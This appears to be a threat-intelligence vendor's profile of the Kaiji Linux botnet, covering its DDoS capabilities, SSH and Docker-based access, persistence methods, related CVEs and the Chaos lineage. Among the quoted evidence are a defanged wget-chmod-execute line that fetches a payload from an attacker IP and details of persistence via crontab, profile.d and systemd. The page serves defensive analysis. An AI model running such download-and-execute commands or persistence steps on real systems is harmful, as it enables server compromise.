Kaiji is a Go-based Linux botnet, originally identified in activity attributed to Chinese-origin operators, built with a custom implant rather than reused Mirai or BillGates code. It targets Linux servers and IoT devices, historically gaining access through SSH brute-force attacks against root accounts and later targeting exposed, unauthenticated Docker APIs by deploying malicious containers. Kaiji supports multiple distributed-denial-of-service methods, including TCP, UDP, SYN, ACK, SYN-ACK, IP-spoofing, and WebSocket attacks. It accepts command-and-control instructions to execute shell commands, update command-and-control configuration, remove itself, and conduct further SSH brute forcing. The malware can attempt propagation to known hosts using locally available SSH keys and addresses recovered from shell history. Kaiji establishes persistence through system services, init scripts, shell-profile modifications, cron jobs, and watchdog-style execution. Observed variants have masqueraded as legitimate system utilities, altered SELinux policy enforcement, relocated binaries, and used bind mounts to hinder detection. Kaiji was deployed in Linux server compromises involving exploitation of public-facing applications, including Apache web-server and React Server Components flaws. Chaos is assessed as a likely evolution of the Kaiji botnet based on code overlap.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets...
Santander’s security research team claims this threat actor is targeting security researchers by hiding a malicious backdoor in CVE-2024-6387 proof-of-concept code, and when running the PoC it will lead to infection of the server with Kaiji malware.
30 distinct techniques documented for this family, organized by ATT&CK tactic.
GSOCKET sets up a cron job that runs its binary with the secret key every minute; KAIJI also alters /etc/crontab to execute /.img as root on a schedule.
wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP chmod 777 VIP ./VIP
The attacker used the www-data account to download a script named 00.sh; subsequent payloads were executed with sh -c, wget, chmod, and bash.
main_runghost: Install persistence through /etc/profile.d (/etc/profile.d/linux.sh)
GSOCKET sets up a cron job that runs its binary with the secret key every minute; KAIJI also alters /etc/crontab to execute /.img as root on a schedule.
The Apache backdoor became active again, and gk.php and 404.php PHP payloads were fetched for likely future access.
main_runkshell: Install persistence through rc.d and Systemd services: Systemd (/etc/systemd/system/linux.service)
The detection rule flags suspicious shell configuration-file creation, "aligning with tactics like persistence and event-triggered execution."
main_runghost: Install persistence through /etc/profile.d (/etc/profile.d/linux.sh)
GSOCKET sets up a cron job that runs its binary with the secret key every minute; KAIJI also alters /etc/crontab to execute /.img as root on a schedule.
main_runkshell: Install persistence through rc.d and Systemd services: Systemd (/etc/systemd/system/linux.service)
some of the C2 addresses are decrypted through a chain of three encryption schemes, while another C2 address is simply encoded in base64
A /usr/bin/lib directory is created and then Kaiji is installed under the filename ‘netstat’, ‘ps’, ‘ls’, or some other system tool name.
Afterwards, the script also removed other Linux binaries that are basic components of the operating system but are not necessary for its DDoS operation.
In late April we identified a new botnet campaign with definitive Chinese origins, targeting servers and IoT devices via SSH brute forcing.
whatserver.sh gathers server details including currently listening services, while malware installs and interacts with Systemd and SysVinit services.
The XORDDoS infection started with the attackers searching for hosts with exposed Docker API ports (2375).
73 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
35 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A MIPS-based IoT malware family included as one of seven balanced malware-family classes in the proof-of-concept EMBeD benchmark dataset.
A MIPS-based IoT malware family included in the EMBeD proof-of-concept benchmark dataset.
Referenced as the likely predecessor or code ancestor of Chaos, with inherited botnet functionality later reworked or removed.
Botnet malware that targeted misconfigured Docker instances and is described as the precursor or evolutionary basis for Chaos.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.